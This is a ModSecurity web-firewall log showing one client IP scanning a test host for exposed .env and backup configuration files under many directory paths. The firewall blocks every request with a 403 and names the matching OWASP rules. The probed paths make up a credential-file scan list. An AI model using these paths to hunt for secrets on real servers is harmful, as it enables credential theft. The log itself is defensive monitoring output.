[Wed Dec 10 07:47:29.789350 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTkXgUcYaZQwDd7_nrtnUQAAAAM"]
[Wed Dec 10 07:47:29.789547 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTkXgUcYaZQwDd7_nrtnUQAAAAM"]
[Wed Dec 10 07:47:29.832432 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aTkXgUcYaZQwDd7_nrtnUgAAAAM"]
[Wed Dec 10 07:47:29.832666 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aTkXgUcYaZQwDd7_nrtnUgAAAAM"]
[Wed Dec 10 07:47:29.832872 2025] [:error] [pid 636938] [client 45.148.10.247:60666] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aTkXgUcYaZQwDd7_nrtnUgAAAAM"]
[Wed Dec 10 07:47:30.204630 2025] [:error] [pid 636935] [client 45.148.10.247:45020] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aTkXgmHv40YZWlW-27908AAAAAA"]
[Wed Dec 10 07:47:30.204866 2025] [:error] [pid 636935] [client 45.148.10.247:45020] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aTkXgmHv40YZWlW-27908AAAAAA"]
[Wed Dec 10 07:47:30.205047 2025] [:error] [pid 636935] [client 45.148.10.247:45020] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aTkXgmHv40YZWlW-27908AAAAAA"]
[Wed Dec 10 07:47:30.340356 2025] [:error] [pid 637204] [client 45.148.10.247:45022] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTkXgutcX02MNS9MxJgQyQAAAAk"]
[Wed Dec 10 07:47:30.340613 2025] [:error] [pid 637204] [client 45.148.10.247:45022] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTkXgutcX02MNS9MxJgQyQAAAAk"]
[Wed Dec 10 07:47:30.340801 2025] [:error] [pid 637204] [client 45.148.10.247:45022] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTkXgutcX02MNS9MxJgQyQAAAAk"]
[Wed Dec 10 07:47:30.382663 2025] [:error] [pid 637204] [client 45.148.10.247:45022] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aTkXgutcX02MNS9MxJgQygAAAAk"]
[Wed Dec 10 07:47:30.382894 2025] [:error] [pid 637204] [client 45.148.10.247:45022] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aTkXgutcX02MNS9MxJgQygAAAAk"]
[Wed Dec 10 07:47:30.383071 2025] [:error] [pid 637204] [client 45.148.10.247:45022] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aTkXgutcX02MNS9MxJgQygAAAAk"]
[Wed Dec 10 07:47:30.508639 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlAAAAAQ"]
[Wed Dec 10 07:47:30.508899 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlAAAAAQ"]
[Wed Dec 10 07:47:30.509094 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlAAAAAQ"]
[Wed Dec 10 07:47:30.547754 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlQAAAAQ"]
[Wed Dec 10 07:47:30.547983 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlQAAAAQ"]
[Wed Dec 10 07:47:30.548167 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlQAAAAQ"]
[Wed Dec 10 07:47:30.592623 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlgAAAAQ"]
[Wed Dec 10 07:47:30.592929 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlgAAAAQ"]
[Wed Dec 10 07:47:30.593101 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aTkXgrCnovWtbeVvHnHWlgAAAAQ"]
[Wed Dec 10 07:47:30.806681 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aTkXgrCnovWtbeVvHnHWlwAAAAQ"]
[Wed Dec 10 07:47:30.806977 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aTkXgrCnovWtbeVvHnHWlwAAAAQ"]
[Wed Dec 10 07:47:30.807170 2025] [:error] [pid 636939] [client 45.148.10.247:45032] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aTkXgrCnovWtbeVvHnHWlwAAAAQ"]
[Wed Dec 10 07:47:33.755191 2025] [:error] [pid 636979] [client 45.148.10.247:45062] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTkXhUgy26Zu7JFzi64JfAAAAAY"]
[Wed Dec 10 07:47:33.755457 2025] [:error] [pid 636979] [client 45.148.10.247:45062] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTkXhUgy26Zu7JFzi64JfAAAAAY"]
[Wed Dec 10 07:47:33.755694 2025] [:error] [pid 636979] [client 45.148.10.247:45062] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTkXhUgy26Zu7JFzi64JfAAAAAY"]
[Wed Dec 10 07:47:39.106615 2025] [:error] [pid 636936] [client 45.148.10.247:55024] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTkXiyj7S3f8o0DuYfxzWwAAAAE"]
[Wed Dec 10 07:47:39.106870 2025] [:error] [pid 636936] [client 45.148.10.247:55024] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTkXiyj7S3f8o0DuYfxzWwAAAAE"]
[Wed Dec 10 07:47:39.107058 2025] [:error] [pid 636936] [client 45.148.10.247:55024] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aTkXiyj7S3f8o0DuYfxzWwAAAAE"]
[Wed Dec 10 07:47:42.679271 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTkXjpV8tnhi0nExSI590QAAAAo"]
[Wed Dec 10 07:47:42.679567 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTkXjpV8tnhi0nExSI590QAAAAo"]
[Wed Dec 10 07:47:42.679766 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aTkXjpV8tnhi0nExSI590QAAAAo"]
[Wed Dec 10 07:47:43.608700 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aTkXj5V8tnhi0nExSI590gAAAAo"]
[Wed Dec 10 07:47:43.608945 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aTkXj5V8tnhi0nExSI590gAAAAo"]
[Wed Dec 10 07:47:43.609138 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aTkXj5V8tnhi0nExSI590gAAAAo"]
[Wed Dec 10 07:47:43.630970 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aTkXj5V8tnhi0nExSI590wAAAAo"]
[Wed Dec 10 07:47:43.631202 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aTkXj5V8tnhi0nExSI590wAAAAo"]
